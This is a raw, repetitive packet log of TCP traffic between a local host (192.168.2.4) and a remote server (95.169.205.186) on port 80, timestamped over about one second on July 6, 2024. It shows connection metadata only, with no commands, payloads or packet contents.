                                                              Jul 6, 2024 04:22:00.953685999 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.953696012 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.953702927 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.953710079 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.953727007 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.953744888 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.954516888 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.954528093 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.954536915 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.954546928 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.954557896 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.954565048 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.954570055 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.954580069 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.954585075 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.954591990 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.954596996 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.954605103 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.954607964 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.954619884 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.954621077 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.954632044 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.954643011 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.954643965 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.954654932 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.954658985 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.954668045 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.954679012 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.954689026 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.954689980 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.954719067 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.954730988 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.955332994 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.955344915 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.955353022 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.955363035 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.955373049 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.955383062 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.955385923 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:00.955411911 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:00.955425024 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.034854889 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.034878016 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.034928083 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.034945965 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.034957886 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.034990072 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.035164118 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.035178900 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.035188913 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.035198927 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.035207987 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.035212040 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.035234928 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.035265923 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.035397053 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.035407066 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.035418034 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.035429001 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.035439014 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.035444021 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.035450935 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.035461903 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.035470009 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.035475016 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.035485983 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.035489082 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.035499096 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.035506010 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.035525084 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.035547972 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.035811901 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.035823107 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.035831928 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.035840988 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.035851002 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.035861015 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.035862923 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.035886049 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.035902023 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.036336899 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.036355972 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.036365032 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.036389112 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.036407948 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.036467075 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.036478043 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.036490917 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.036514997 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.036540031 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.036612034 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.036623001 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.036633015 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.036658049 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.036680937 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.036753893 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.036765099 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.036775112 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.036803007 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.036827087 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.036896944 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.036906958 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.036916971 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.036937952 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.036940098 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.036947966 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.036959887 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.036967039 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.036993980 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.037096024 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.037138939 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.037473917 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.037513971 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.037519932 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.037525892 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.037564993 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.037658930 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.037669897 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.037676096 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.037682056 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.037708998 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.037723064 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.037796021 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.037846088 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.037883997 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.037902117 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.037911892 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.037923098 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.037930012 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.037934065 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.037945986 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.037950993 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.037956953 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.037971020 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.037981987 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.037997007 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.038024902 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.038317919 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.038330078 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.038369894 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.038463116 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.038474083 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.038484097 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.038494110 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.038511992 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.038512945 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.038526058 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.038527966 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.038537979 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.038548946 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.038558960 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.038562059 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.038569927 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.038582087 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.038590908 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.038599968 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.038613081 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.038616896 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.038625956 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.038640976 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.038661003 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.039227962 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.039237976 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.039252996 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.039263010 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.039268970 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.039273024 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.039284945 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.039297104 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.039297104 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.039308071 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.039319038 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.039319992 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.039330959 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.039338112 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.039344072 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.039369106 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.039387941 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.039978027 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.040036917 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.040117025 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.040163994 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.040163994 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.040174961 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.040201902 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.040221930 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.040257931 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.040268898 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.040278912 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.040290117 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.040304899 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.040340900 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.040465117 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.040487051 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.040513992 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.040538073 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.040616989 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.040627003 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.040637970 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.040648937 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.040659904 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.040666103 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.040672064 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.040683031 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.040692091 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.040698051 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.040704966 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.040716887 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.040720940 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.040740013 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.040757895 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.040919065 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.040934086 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.040956020 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.040966034 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.040966034 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.040978909 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.040980101 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.040990114 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.041001081 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.041013002 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.041033983 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.132034063 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.132081985 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.132096052 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.132103920 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.132118940 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.132144928 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.132167101 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.132178068 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.132209063 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.132327080 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.132338047 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.132348061 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.132358074 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.132369995 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.132375956 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.132380962 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.132395029 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.132411957 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.132438898 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.132589102 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.132600069 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.132610083 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.132628918 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.132637978 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.132647991 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.132649899 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.132661104 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.132672071 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.132673979 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.132697105 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.132719994 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.133022070 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.133033991 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.133044004 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.133054972 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.133064032 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.133068085 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.133081913 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.133091927 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.133094072 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.133105040 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.133109093 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.133116961 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.133128881 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.133131981 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.133155107 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.133167982 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.133771896 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.133825064 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.133829117 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.133841038 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.133871078 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.133928061 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.133936882 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.133946896 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.133975983 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.133994102 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.134072065 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.134082079 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.134124994 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.134156942 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.134167910 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.134203911 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.134267092 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.134314060 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.134315014 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.134327888 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.134360075 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.134438992 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.134449005 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.134459019 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.134488106 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.134500980 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.134707928 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.134753942 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.134772062 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.134783983 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.134819984 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.134910107 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.134922028 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.134932041 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.134944916 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.134960890 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.134979963 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.135082960 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.135092974 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.135102987 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.135133028 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.135147095 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.135226965 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.135236979 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.135246038 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.135256052 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.135277987 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.135304928 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.135478020 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.135489941 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.135499954 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.135512114 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.135521889 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.135523081 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.135535002 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.135548115 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.135548115 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.135567904 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.135588884 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.135710955 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.135756969 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.135874987 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.135885954 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.135895967 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.135909081 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.135920048 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.135920048 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.135931969 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.135941982 CEST804973095.169.205.186192.168.2.4
                                                              Jul 6, 2024 04:22:01.135946035 CEST4973080192.168.2.495.169.205.186
                                                              Jul 6, 2024 04:22:01.135955095 CEST804973095.169.205.186192.168.2.4
